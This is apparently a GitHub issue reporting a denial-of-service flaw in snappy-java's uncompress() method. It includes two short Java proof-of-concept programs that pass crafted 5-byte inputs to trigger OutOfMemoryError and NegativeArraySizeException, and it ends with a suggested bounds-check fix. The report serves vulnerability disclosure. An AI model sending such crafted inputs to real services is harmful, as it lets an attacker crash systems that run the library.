snappy-java icon indicating copy to clipboard operation
snappy-java copied to clipboard
verified publisher icon xerial

Missing bound check on uncompress() in snappy-java can lead to Denial of Service (DoS) impact

Open c2an1 opened this issue 1 year ago • 0 comments

Description

The uncompress() method in snappy-java lacks proper validation of the uncompressedLength, which leads to a potential Denial of Service (DoS) vulnerability. Specifically, with only 5 bytes of input, the library becomes vulnerable to DoS attacks.

Details

In the Snappy.java, the uncompress() method is implemented as follows:

public static byte[] uncompress(byte[] input) throws IOException {
    byte[] result = new byte[Snappy.uncompressedLength(input)];
    Snappy.uncompress(input, 0, input.length, result, 0);
    return result;
}

When creating the new byte[] array, there is no upper bounds check on the uncompressedLength. As a result, if uncompressedLength is too large, it can lead to an OutOfMemoryError, similar to the vulnerability of snappy-java described in https://github.com/advisories/GHSA-55g7-9cwv-5qfv (GitHub advisory).

Proof of Concept (PoC) 1

import org.xerial.snappy.Snappy;

public class PoC1 {
    public static void main(String[] args) {
        byte[] data = new byte[] { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x07 };
        try {
            byte[] uncompressedData = Snappy.uncompress(data);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

This will produce the following exception: java.lang.OutOfMemoryError

Similarly, as seen in https://github.com/advisories/GHSA-pqr6-cmr2-h8hf (GitHub advisory), the absence of lower bounds checks on uncompressedLength can lead to a NegativeArraySizeException due to integer overflow.

Proof of Concept (PoC) 2

import org.xerial.snappy.Snappy;

public class PoC2 {
    public static void main(String[] args) {
        byte[] data = new byte[] { (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0x08 };
        try {
            byte[] uncompressedData = Snappy.uncompress(data);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

This will produce the following exception: java.lang.NegativeArraySizeException

Impact Denial of Service (DoS).

Mitigation To resolve this issue, we suggest adding bounds validation in the uncompress() method before allocating the array. Specifically, ensure that Snappy.uncompressedLength(input) is greater than 0 and below a reasonable upper limit, similar to the fix applied in https://github.com/advisories/GHSA-55g7-9cwv-5qfv.

c2an1 avatar Dec 23 '24 09:12 c2an1